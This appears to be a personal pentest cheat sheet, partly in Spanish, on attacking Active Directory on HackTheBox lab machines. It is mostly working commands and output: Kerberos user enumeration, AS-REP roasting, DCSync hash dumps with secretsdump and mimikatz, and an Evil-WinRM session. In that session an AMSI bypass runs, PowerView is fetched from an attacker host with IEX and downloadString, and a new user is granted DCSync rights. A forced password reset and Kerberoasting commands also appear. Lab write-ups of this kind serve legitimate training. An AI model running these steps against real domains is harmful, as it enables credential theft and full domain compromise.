AD Enumeration
Common Terminology
Ticket Granting Ticket (TGT) - A ticket-granting ticket is an authentication ticket used to request service tickets from the TGS for specific resources from the domain.
Key Distribution Center (KDC) - The Key Distribution Center is a service for issuing TGTs and service tickets that consist of the Authentication Service and the Ticket Granting Service.
Authentication Service (AS) - The Authentication Service issues TGTs to be used by the TGS in the domain to request access to other machines and service tickets.
Ticket Granting Service (TGS) - The Ticket Granting Service takes the TGT and returns a ticket to a machine on the domain.
Service Principal Name (SPN) - A Service Principal Name is an identifier given to a service instance to associate a service instance with a domain service account. Windows requires that services have a domain service account which is why a service needs an SPN set.
KDC Long Term Secret Key (KDC LT Key) - The KDC key is based on the KRBTGT service account. It is used to encrypt the TGT and sign the PAC.
Client Long Term Secret Key (Client LT Key) - The client key is based on the computer or service account. It is used to check the encrypted timestamp and encrypt the session key.
Service Long Term Secret Key (Service LT Key) - The service key is based on the service account. It is used to encrypt the service portion of the service ticket and sign the PAC.
Session Key - Issued by the KDC when a TGT is issued. The user will provide the session key to the KDC along with the TGT when requesting a service ticket.
Privilege Attribute Certificate (PAC) - The PAC holds all of the user's relevant information, it is sent along with the TGT to the KDC to be signed by the Target LT Key and the KDC LT Key in order to validate the user.
Attack Privilege Requirements
Kerbrute Enumeration - No domain access required
Pass the Ticket - Access as a user to the domain required
Kerberoasting - Access as any user required
AS-REP Roasting - Access as any user required
Golden Ticket - Full domain compromise (domain admin) required
Silver Ticket - Service hash required
Skeleton Key - Full domain compromise (domain admin) required
enum4linux 10.10.129.219
Guia completa de Crackmapexec
AS-REP Roasting
Por lo general, cuando intenta solicitar la autenticación a través de Kerberos, primero la parte solicitante debe autenticarse en el DC.
Pero hay una opción, DONT_REQ_PREAUTH
donde el DC simplemente enviará el hash a un usuario no autenticado. AS-REP Roasting está buscando si algún usuario conocido tiene esta opción configurada.
$ impacket-GetNPUsers egotistical-bank.local/ -no-pass -usersfile users-kerbrute
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:de15a92de8e4d862924076adb6e989db$d0dfc38.....
[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
Enumeración de usuarios en Kerberos
./kerbrute_linux_amd64 userenum --dc 10.10.10.175 -d egotistical-bank.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
cat kerbrute-users.txt | grep VALID | awk '{print $7}' > users-valid.txt
Obtener información del dominio LDAP
ldapsearch -x -h 10.10.10.175 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL'
ldapsearch -x -h 10.10.10.111 -D 'svcorp2\alice' -w 'Password01' -b "DC=svcorp2,DC=com"
Filtros interesantes para la salida de LDAPSEARCH
cat data.resolute | grep -i password
cat data.resolute | grep sAMAccountName
DCSync
$ impacket-secretsdump svc_loanmgr@10.10.10.111
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
##################################################
## Otra manera con Mimikatz
.\mimikatz.exe 'lsadump::dcsync /domain:egotistical-bank.local /user:Administrator' exit
.#####. mimikatz 2.2.0 (x86) #19041 Sep 18 2020 19:18:00
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /domain:egotistical-bank.local /user:Administrator
[DC] 'egotistical-bank.local' will be the domain
[DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server
[DC] 'Administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 7/26/2021 8:16:16 AM
Object Security ID : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID : 500
Credentials:
Hash NTLM: 823452073d75b9d1cf70ebdf86c7f98e
ntlm- 0: 823452073d75b9d1cf70ebdf86c7f98e
ntlm- 1: d9485863c1e9e05851aa40cbb4ab9dff
ntlm- 2: 7facdc498ed1680c4fd1448319a8c04f
lm - 0: 365ca60e4aba3e9a71d78a3912caf35c
lm - 1: 7af65ae5e7103761ae828523c7713031
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 716dbadeed0e537580d5f8fb28780d44
### EJEMPLO CON LA MAQUINA FOREST ###
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Bypass-4MSI
[+] Success!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7/PowerView.ps1')
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user gerh Password123! /add /domain
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup "Remote Management Users" gerh /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" gerh /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb\gerh', $SecPassword)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-ObjectACL -PrincipalIdentity gerh -Credential $Cred -Rights DCSync
Enumeracion de usuarios con rpcclient
rpcclient -U "" -N 10.10.10.111
rpcclient $> querydominfo
Domain: HTB
Server:
Comment:
Total Users: 105
Total Groups: 0
Total Aliases: 0
Sequence No: 1
Force Logoff: -1
Domain Server State: 0x1
Server Role: ROLE_DOMAIN_PDC
Unknown 3: 0x1
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
## Cambio de password con RPCCLIENT
rpcclient -U blackfield/support 10.10.10.192
Enter BLACKFIELD\support's password:
rpcclient $> setuserinfo2 audit2020 23 'Hackeroso'
result: NT_STATUS_PASSWORD_RESTRICTION
result was NT_STATUS_PASSWORD_RESTRICTION
rpcclient $> setuserinfo audit2020 23 'Hackeroso'
result: NT_STATUS_PASSWORD_RESTRICTION
result was NT_STATUS_PASSWORD_RESTRICTION
rpcclient $> setuserinfo audit2020 23 'H@ckeros0'
rpcclient $> exit
## Obtener solo los usuarios validos gracias al RPCCLIENT
cat users.txt | awk -F\[ '{print $2}' | awk -F \] '{print $1}' | grep -v Guest > valid_users.txt
rpcclient -U "" -N 10.10.10.111 -c "enumdomusers" | grep -oP '\[.*?\]' | grep -v "0x" | tr -d '[]' > users
Escaneo con Nmap sobre LDAP
nmap -n -sV --script "ldap* and not brute" 10.10.10.111 -Pn
Rutas Interesantes
\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
Instalacion de bloodhound-python
If you have domain credentials you can run a python bloodhound ingestor from any platform so you don't need to depend on Windows.
Download it from
https://github.com/fox-it/BloodHound.py
systemctl restart docker
git clone https://github.com/fox-it/BloodHound.py.git
docker build -t bloodhound .
docker run -v ${PWD}:/bloodhound-data -it bloodhound
bloodhound-python -u alice -p Password01 -d svcorp.com -gc sv-dc01.svcorp.com -c all -ns 10.10.10.111
Impacket-GetUserSPNs
impacket-GetUserSPNs svcorp.com/alice -dc-ip 10.10.10.111 -outputfile hashes.kerberoast
Significado del hash aad3b435b51404eeaad3b435b51404ee
GetUserSPN.ps1
Get-TGSCipher.ps1
.\Get-TGSCipher.ps1 -SPN "MSSQLSvc/xor-app23.xor.com:1433" -Format John
Última actualización